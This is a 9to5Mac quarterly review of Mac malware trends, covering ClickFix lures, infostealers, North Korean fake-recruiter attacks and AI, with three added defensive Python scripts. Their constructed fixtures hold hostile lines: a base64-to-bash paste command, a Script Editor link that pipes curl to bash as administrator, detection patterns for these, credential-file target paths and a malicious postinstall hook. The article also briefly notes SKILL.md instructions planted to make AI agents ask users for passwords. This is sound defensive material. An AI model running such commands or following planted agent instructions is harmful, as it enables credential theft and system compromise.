Beirut time - 6/1/2026 2:03:42 AM - GMT (+2)
9to5Mac Security Bite is exclusively brought to you by Mosyle, the only Apple Unified Platform. Making Apple devices work-ready and enterprise-safe is all we do. Our unique integrated approach to management and security combines state-of-the-art Apple-specific security solutions for fully automated Hardening & Compliance, Next Generation EDR, AI-powered Zero Trust, and exclusive Privilege Management with the most powerful and modern Apple MDM on the market. The result is a totally automated Apple Unified Platform currently trusted by over 45,000 organizations to make millions of Apple devices work-ready with no effort and at an affordable cost. Request your EXTENDED TRIAL today and understand why Mosyle is everything you need to work with Apple.
This is the first quarterly Mac threat landscape review in the Security Bite series. The first quarter of this year was pretty quiet on the iPhone front, and when it comes to the walled fortress of iOS, no news is basically good news. So this Q1 review focuses on the Mac malware landscape: what it looks like today and where things seem to be heading.
I’ll look back on every report I covered, every guest I had on the Security Bite Podcast, and most of the samples that crossed my desk over the past three(ish) months.
There are three major takeaways from this Q1 review. The first is that attackers have mostly stopped trying to break into Macs and are instead getting let in…
ClickFix, and Apple's counterpunch that didn't woo
So, ClickFix is a problem. But what exactly is it doing to lure people into infecting themselves?
This quarter brought more fake CAPTCHAs, spoofed "Reclaim disk space on your Mac" pages, malvertised ChatGPT and Atlas browser downloads, typosquatted installers aimed at crypto wallets, and bogus setup pages for AI tools like Claude Code hosted on otherwise legitimate platforms. Threat actors even abused public Claude artifacts paired with hijacked Google Ads to push malicious instructions to the top of search results.
Huntress documented a variation called CrashFix, where a malicious extension posing as an ad blocker crashes your browser and then walks you through a fake recovery flow. The payload at the end is almost always an infostealer and often contains remnants of the once-infamous Atomic Stealer (AMOS).
At one point, Atomic Stealer was the dominant Mac infostealer by a wide margin. I've seen reports of it accounting for around 80% of samples.
From my conversations with Apple researchers in Q1, the developer behind the official Atomic Stealer project is believed to have gone underground after folding its dark web site.
“They kind of disappeared, but not really. Most of the detections on VirusTotal still say it’s AMOS, and it’s been really hard to distinguish because they share so much of the same codebase. You have to look at very specific things to tell that this is attributed to this group,” macOS/iOS reverse engineer Chris Lopez told me on the Security Bite Podcast.
I asked him who exactly is falling for these attacks.
“I’ve seen a lot of developers get targeted recently, which is interesting, because that’s an entryway into much more complicated compromises. But anyone can fall victim to it if you’re not paying attention and you haven’t seen this type of threat before.”
People knock Apple a lot, for many different reasons, often deservedly so. But when it comes to macOS security, the company has recently had a decent reaction time to emerging threats.
macOS Sequoia killed the good old right-click Gatekeeper bypass in 2024. That was a response to so many Mac users installing malicious clones of Slack, Notion, and other popular apps, games, and utilities that weren't signed and notarized by Apple. I still put my head in my hands over how that was allowed to exist for so long. I'll spare you the rant; moving on…
The most significant security change in Q1 this year came in macOS Tahoe 26.4. Apple introduced prompt warnings that fire when you paste a suspicious command into Terminal.
It held for about two weeks before Jamf Threat Labs documented a ClickFix variant that skips Terminal entirely, using a spoofed Apple webpage and an applescript:// URL scheme to open Script Editor with a malicious script preloaded. Because the command never touches Terminal, the new warning never fires. And so goes the never-ending tug-of-war between Apple and malware authors.
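A way to triage a suspected lure page for both of the delivery paths covered above, the paste-this-into-Terminal lure and the Script Editor variant, as an added example that is not code from 9to5Mac, Jamf, or the campaigns described: it pulls the paste snippets and any applescript:// links out of the HTML and flags the shell-execution, download, decode, password-prompt and persistence patterns that a genuine "fix your Mac" page has no reason to contain. The link format in the sample, applescript://com.apple.scripteditor?action=new&script=..., is assumed to be the Script Editor URL scheme the variant abuses; the page itself is constructed for the example.

```python
"""Offline triage of a ClickFix-style lure page.

Added example, not 9to5Mac's, Jamf's, or the malware authors' code. It pulls
out the two delivery paths described in the article: a command the page tells
the victim to paste into Terminal, and an applescript:// link that hands
Script Editor a preloaded script. ASSUMPTION: the link format used in the
sample, applescript://com.apple.scripteditor?action=new&script=<url-encoded>,
is the Script Editor URL scheme; the page itself is constructed for this
example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Patterns a legitimate "fix your Mac" page has no reason to ask of a user.
SUSPICIOUS = {
    "shell_exec":   re.compile(r"do shell script|osascript", re.I),
    "remote_fetch": re.compile(r"\b(curl|wget)\b", re.I),
    "pipe_to_sh":   re.compile(r"\|\s*(ba|z)?sh\b", re.I),
    "base64":       re.compile(r"base64\s+(-d|-D|--decode)\b", re.I),
    "pwd_prompt":   re.compile(r"with hidden answer|administrator privileges", re.I),
    "persistence":  re.compile(r"LaunchAgents|LaunchDaemons|launchctl", re.I),
}


class _LureParser(HTMLParser):
    """Collect every href and the text of <pre>/<code> blocks (paste targets)."""

    def __init__(self):
        super().__init__()
        self.links, self.snippets, self._in_code = [], [], 0

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if tag == "a" and href:
            self.links.append(href)
        if tag in ("pre", "code"):
            self._in_code += 1

    def handle_endtag(self, tag):
        if tag in ("pre", "code") and self._in_code:
            self._in_code -= 1

    def handle_data(self, data):
        if self._in_code and data.strip():
            self.snippets.append(data.strip())


def applescript_payload(url):
    """Return the script a link would preload into Script Editor, else None."""
    parsed = urlparse(url)
    if parsed.scheme.lower() != "applescript":
        return None
    return parse_qs(parsed.query).get("script", [""])[0]


def flag(text):
    """Names of every suspicious pattern present in a command or script."""
    return sorted(name for name, rx in SUSPICIOUS.items() if rx.search(text))


def triage(html):
    """List each paste snippet or Script Editor payload that trips a pattern."""
    parser = _LureParser()
    parser.feed(html)
    findings = [{"vector": "terminal_paste", "content": s, "flags": flag(s)}
                for s in parser.snippets]
    for href in parser.links:
        script = applescript_payload(href)
        if script is not None:
            findings.append({"vector": "script_editor", "content": script,
                             "flags": flag(script)})
    return [f for f in findings if f["flags"]]


# Constructed lure page: one Terminal paste block and one applescript:// link.
SAMPLE_PAGE = """<html><body>
<h1>Reclaim disk space on your Mac</h1>
<p>Open Terminal and paste this to repair your disk:</p>
<pre>echo 'ZWNobyBoaQ==' | base64 -d | bash</pre>
<p>Or use the one-click fixer:</p>
<a href="applescript://com.apple.scripteditor?action=new&amp;script=do%20shell%20script%20%22curl%20-fsSL%20https%3A%2F%2Fexample.invalid%2Fx%20%7C%20bash%22%20with%20administrator%20privileges">Fix now</a>
<a href="https://example.invalid/help">Help</a>
</body></html>"""

if __name__ == "__main__":
    for f in triage(SAMPLE_PAGE):
        print(f["vector"], f["flags"], "::", f["content"])
```

Running it prints both findings. The useful part is that the Script Editor payload is visible in the link itself, percent-encoded, so a proxy, mail gateway or browser extension can score it without anyone opening Script Editor; a link carrying nothing but `do shell script ... with administrator privileges` is exactly the kind of command the Terminal warning was meant to catch.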
In the words of Jeff Goldblum from an alternate universe, “Malware finds a way.” 🦖
Infostealers and trojans are becoming one and the same
There's a very interesting data point from Jamf's 2026 Security 360 report, published last quarter, that I think reflects just how sophisticated Mac malware is becoming.
The popular Apple MDM firm found that Trojans jumped from 16.61% of detections in 2024 to 50.32% in 2025, making them the largest category of Mac malware.
Atomic Stealer alone accounted for 77% of trojan activity and roughly 78% of infostealer activity, sitting atop both charts because infostealers increasingly bolt on trojan backdoors for persistence.
This gets to the second major takeaway: the malware is becoming more sophisticated, both in its code and its functionality.
The modern stealer is modular. There is a lot less smash-and-grab now; more attackers want a backdoor so they never have to phish you twice.
To quote Chris again, who is one of the most well-known reverse engineers, “macOS malware is getting more and more complicated. Now I often run into a sample where I open it up in Binary Ninja, and everything’s a mess, and I’m like, oh my god, I don’t want to look at this, I’ll just run it and see what happens.”
The new samples this quarter followed that mold, and most showed no antivirus detection. Jamf flagged DigitStealer, which runs mostly in memory and only on M2 or newer, and ChillyHell, a notarized backdoor that had been hiding since 2021.
Mosyle, another popular Apple MDM similar to Jamf, also detected two previously undetected malware samples and shared details with 9to5Mac.
The first, Phoenix Worm, is a Golang stager that quietly establishes a foothold and hands off to a second-stage payload. The second, ShadeStager, is the post-exploitation half, built to harvest SSH keys, AWS, Azure, and GCP credentials, Kubernetes configs, and Git and Docker auth straight off developer machines. The two aren't connected, but together they're a tidy example of where Mac malware is headed: one payload to get in, another to harvest credentials and cloud tokens.
Iru researchers uncovered MonetaStealer in January this year, an early-stage, AI-assisted infostealer that was also undetected on VirusTotal.
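To see what that harvest looks like on your own machine, here is an added inventory script (not Mosyle's or the malware's code) that walks the default locations of the files a stager like ShadeStager is built to take: SSH keys, AWS, Azure and gcloud credentials, kubeconfig, git's plaintext credential store and Docker's config.json. It reports which exist, which are readable beyond the owner, and which Docker registries have their login stored inline rather than behind a credential helper. The paths are the tools' documented defaults; the home directory it builds is a constructed fixture using AWS's documented placeholder key ID.

```python
"""What a single phish hands over: inventory the developer secrets a stager
like ShadeStager is built to harvest, from one home directory.

Added example, not Mosyle's or the malware's code. The paths are the tools'
default locations (ssh, AWS CLI, Azure CLI, gcloud, kubectl, git's store
helper, Docker); the home directory written by build_fixture() is constructed
for this example, with AWS's documented placeholder access key ID.
"""
import json
import os
import stat
import tempfile
from pathlib import Path

# (path relative to $HOME, owning tool). Directories are walked recursively.
TARGETS = [
    (".ssh", "ssh"),
    (".aws/credentials", "aws"),
    (".azure", "azure"),
    (".config/gcloud", "gcloud"),
    (".kube/config", "kubernetes"),
    (".git-credentials", "git"),
    (".docker/config.json", "docker"),
]


def _files_under(path):
    if path.is_file():
        yield path
    elif path.is_dir():
        yield from (p for p in sorted(path.rglob("*")) if p.is_file())


def docker_inline_auths(config_path):
    """Registries whose login sits base64-encoded in config.json because no
    credential helper is configured, i.e. copyable as-is."""
    try:
        cfg = json.loads(config_path.read_text())
    except (OSError, ValueError):
        return []
    return sorted(reg for reg, v in cfg.get("auths", {}).items()
                  if isinstance(v, dict) and "auth" in v)


def inventory(home):
    """One record per secret-bearing file found under home."""
    home = Path(home)
    found = []
    for rel, tool in TARGETS:
        for f in _files_under(home / rel):
            mode = stat.S_IMODE(f.stat().st_mode)
            rec = {"tool": tool, "path": str(f.relative_to(home)),
                   # any group/other bit set: readable by other local users
                   "loose_permissions": bool(mode & 0o077)}
            if tool == "docker":
                rec["inline_registry_auths"] = docker_inline_auths(f)
            found.append(rec)
    return found


def build_fixture():
    """Construct a throwaway home directory resembling a developer's Mac."""
    home = Path(tempfile.mkdtemp(prefix="devhome-"))
    (home / ".ssh").mkdir()
    (home / ".ssh/id_ed25519").write_text(
        "-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed)\n")
    os.chmod(home / ".ssh/id_ed25519", 0o600)
    (home / ".aws").mkdir()
    (home / ".aws/credentials").write_text(
        "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = constructed-not-a-real-secret\n")
    os.chmod(home / ".aws/credentials", 0o644)   # deliberately too loose
    (home / ".docker").mkdir()
    (home / ".docker/config.json").write_text(json.dumps(
        {"auths": {"ghcr.io": {"auth": "Y29uc3RydWN0ZWQ="}}}))  # constructed login
    os.chmod(home / ".docker/config.json", 0o600)
    return home


if __name__ == "__main__":
    for rec in inventory(build_fixture()):
        print(rec)
```

Run it against `Path.home()` instead of the fixture to see your own exposure. Everything it lists is readable by any process running as you, which is all an infostealer is, so the fix is not permissions but keeping short-lived tokens and OS-keychain-backed helpers (Docker and git both support them) instead of static files.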
And lastly, Moonlock Lab uncovered NotNullOSX, a new Go-based stealer whose developer turns out to be the original macOS Stealer author, now planning to add iCloud credential theft.
North Korea can't get enough of macOS
If there's a single group keeping Mac researchers busiest, it's North Korea. Every Apple security professional I spoke with this quarter brought them up, sometimes without my asking.
One of its more interesting attack vectors works by posing as a fake recruiter, sliding into a developer's LinkedIn DMs with a role that's a little too good, then routing them to a "technical assessment" to prove they have what it takes to work at that company. If there's one thing developers love, it's a coding challenge…
“They reach out on LinkedIn and provide a very convincing, ‘Hey, if you can solve this coding challenge, we’ll give you twice as much money as you’re making now,’” Jamf Threat Labs director Jaron Bradley told me.
“Then you open that coding challenge, and when you build it, in the background there’s a build file that runs a little backdoor. Sure, you’ve completed the coding challenge, but you’ve also backdoored your system. And it’s possible that’s even your work system.”
It works because it doesn’t feel like an attack. As Bradley put it, “it feels like you’ve built a relationship with someone who’s going to offer you a job, but in reality it’s somebody that had no intention of doing so.”
The malware being used: BeaverTail, InvisibleFerret, OtterCookie, and FlexibleFerret.
According to security firm Iru, North Korean campaigns are running three separate lures right now: a ClickFix-style “your camera driver is broken” prompt during the fake video call, malicious npm packages handed over as coding challenges, and trojanized Visual Studio Code workspaces.
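Before building a "take-home assessment" from a recruiter, it is worth listing everything in the repository that runs on its own, which is where the backdoor Bradley describes lives. The check below is an added example, not Jamf's or Iru's code: it lists npm lifecycle scripts that execute during `npm install` and VS Code tasks configured to run when the folder opens, the two auto-execution points named above. The repository it builds is a constructed fixture, and `_load_jsonc` assumes comments in tasks.json occupy whole lines.

```python
"""List everything in a cloned "coding challenge" that executes on its own.

Added example, not Jamf's or Iru's code. It checks the two auto-execution
points the article names: npm lifecycle scripts (run during `npm install`
with no explicit `npm run`) and VS Code tasks set to run on folder open.
The repository that build_fixture() writes is constructed for this example;
_load_jsonc assumes comments in tasks.json occupy whole lines.
"""
import json
import re
import tempfile
from pathlib import Path

# Lifecycle names npm executes implicitly during install/publish.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare",
             "prepublish", "preuninstall", "postuninstall")


def _load_jsonc(path):
    """tasks.json allows // comments; drop whole-line ones, then parse."""
    text = re.sub(r"^\s*//.*$", "", path.read_text(), flags=re.M)
    return json.loads(text)


def npm_lifecycle_hooks(repo):
    """(hook, command) pairs that run without anyone typing `npm run`."""
    pkg = Path(repo) / "package.json"
    if not pkg.is_file():
        return []
    scripts = json.loads(pkg.read_text()).get("scripts", {})
    return [(name, scripts[name]) for name in NPM_HOOKS if name in scripts]


def vscode_autorun_tasks(repo):
    """(label, command) pairs for tasks with runOptions.runOn == folderOpen."""
    tasks_file = Path(repo) / ".vscode" / "tasks.json"
    if not tasks_file.is_file():
        return []
    return [(t.get("label", "?"), t.get("command", ""))
            for t in _load_jsonc(tasks_file).get("tasks", [])
            if t.get("runOptions", {}).get("runOn") == "folderOpen"]


def audit(repo):
    """Everything that would execute from a build or a folder open."""
    return {"npm_hooks": npm_lifecycle_hooks(repo),
            "vscode_autorun": vscode_autorun_tasks(repo)}


def build_fixture():
    """Constructed 'assessment' repo with one hook of each kind."""
    repo = Path(tempfile.mkdtemp(prefix="challenge-"))
    (repo / "package.json").write_text(json.dumps({
        "name": "take-home-assessment",
        "scripts": {
            "test": "jest",
            "postinstall": "node -e \"require('./setup/telemetry')\"",
        },
    }))
    (repo / ".vscode").mkdir()
    (repo / ".vscode" / "tasks.json").write_text(
        '{\n'
        '  // "helper" that fires as soon as the folder is opened\n'
        '  "version": "2.0.0",\n'
        '  "tasks": [{"label": "env", "type": "shell",\n'
        '             "command": "sh ./scripts/env.sh",\n'
        '             "runOptions": {"runOn": "folderOpen"}}]\n'
        '}\n')
    return repo


if __name__ == "__main__":
    for kind, items in audit(build_fixture()).items():
        for name, cmd in items:
            print(f"{kind}: {name} -> {cmd}")
```

VS Code's Workspace Trust keeps folder-open tasks from running while a folder is in Restricted Mode, so the real risk there is the reflex click on "Yes, I trust the authors". npm has no equivalent gate; `npm install --ignore-scripts` is the only way to look at the tree before the hooks run.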
Some FlexibleFerret samples even showed up with a valid Apple Developer signature, so they ran without XProtect flagging them. And these crews don't show up light. In a single incident response, Mandiant identified seven distinct macOS malware families all targeting a single person, and all tied to a North Korean group it tracks as UNC1069.
Figuring out who’s behind what is its own headache, and it’s getting worse. “It’s harder to distinguish whether it’s North Korean guys or Russian,” Ksenia Yamburkh, a malware research engineer at Moonlock Lab, told me.
“And pretty often China uses North Korean hackers as their puppets, so they don’t show themselves doing the attacks.” Russian crews, for their part, appear to be adopting North Korean techniques straight from published research.
It's another example of how Mac malware is becoming increasingly sophisticated.
AI is accelerating both sides
It would be hard to discuss the current macOS landscape without mentioning AI, and not of the Apple Intelligence kind. The truth is that threat actors are widely using artificial intelligence to build malware today.
Mosyle recently came to 9to5Mac with a sample that is believed to be one of the first pieces of Mac malware written in part using AI-generated code.
On the offensive side, AI in the form of LLMs is quietly rewriting the rules of detection. “A single sample looks wildly different the next day, after somebody did a blog post that it was detected,” Bradley told me. “That’s not all human. AI is speeding up that process.” And it’s not just mutation. It’s starting to run the whole operation.
“There was a report from Checkpoint about a Chinese hacker who built his own team of AI agents,” Kseniia explained. “It was a malware framework with a roadmap and sprints, plans for what features would be implemented in the next few weeks.” Her team’s reaction was probably yours too: “We were like, oh my gosh. Thankfully, we’ve already implemented AI agents in our workflows, so we keep up. But it’s a hot race.”
The agent tools themselves are turning into targets too. Researchers have raised flags about platforms like OpenClaw, where AI agents run shell commands with deep access to your machine. In at least one campaign, attackers tucked malicious instructions inside SKILL.md files so an agent would do the work and then ask the user, very politely, for their password.
And I couldn’t talk about AI without mentioning Claude Mythos, Anthropic’s highly coveted frontier model that’s insanely good at finding software vulnerabilities. It technically broke in April, just past our Q1 window, but it’s too big to skip. Unlike the company’s other models, Anthropic has no plans to release this one to the public. Instead it handed it to Project Glasswing, a consortium of more than 40 companies with Apple among them, the idea being that Mythos can find and fix flaws in critical software before attackers do.
In pre-release testing, it reportedly surfaced thousands of previously unknown zero-days across every major operating system and browser, and wrote working exploits on the first attempt in more than 83% of cases, macOS included.
Here’s why that matters for your Mac. Apple now has an in-house tool that can hunt macOS zero-days at an incredible scale, which should mean faster hardening on its end. The flip side is the timeline. Attackers can’t touch Mythos right now because Anthropic is gatekeeping it hard, but capability like this always commoditizes.
The day an open or leaked model can find macOS zero-days the way Mythos does, every social engineering trick in this piece starts to look quaint. We’re not there yet, but we will be.
Security Bite is 9to5Mac’s weekly deep dive into the world of Apple security. Each week, Arin Waichulis unpacks new threats, privacy tips and concerns, vulnerabilities, and more, shaping an ecosystem of over 2 billion devices.
Follow Arin: Twitter/X, LinkedIn, Threads
FTC: We use income earning auto affiliate links.